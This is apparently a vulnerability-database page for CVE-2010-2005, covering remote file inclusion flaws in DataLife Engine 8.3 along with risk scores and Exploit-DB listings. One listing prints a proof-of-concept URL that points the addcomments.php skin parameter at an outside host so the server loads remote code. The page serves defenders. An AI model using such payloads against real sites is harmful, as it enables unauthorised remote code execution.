VIR Vulnerability Intelligence Relay

CVE-2010-2005

high
Published 2010-05-20 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

Multiple PHP remote file inclusion vulnerabilities in DataLife Engine (DLE) 8.3 allow remote attackers to execute arbitrary PHP code via a URL in (1) the selected_language parameter to engine/inc/include/init.php, (2) the config[langs] parameter to engine/inc/help.php, (3) the config[lang] parameter to engine/ajax/pm.php, (4) and the _REQUEST[skin] parameter to engine/ajax/addcomments.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33544 webapps php verified text ยท 1 KB
indoushka ยท 2010-01-19

DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion

text exploit Source: Exploit-DB 
source: https://www.securityfocus.com/bid/37851/info
   
Datalife Engine is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
   
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
   
Datalife Engine 8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://www.example2.com
EDB-33543 webapps php verified
indoushka ยท 2010-01-19

DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion

Source code queued for fetch โ€” refresh in a moment.
EDB-33542 webapps php verified
indoushka ยท 2010-01-19

DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion

Source code queued for fetch โ€” refresh in a moment.
EDB-33541 webapps php verified
indoushka ยท 2010-01-19

DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion

Source code queued for fetch โ€” refresh in a moment.

Application impact
VendorProductVersionsFixed
datalifecmsdatalife_engine8.3

References

CWEs

CWE-94

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.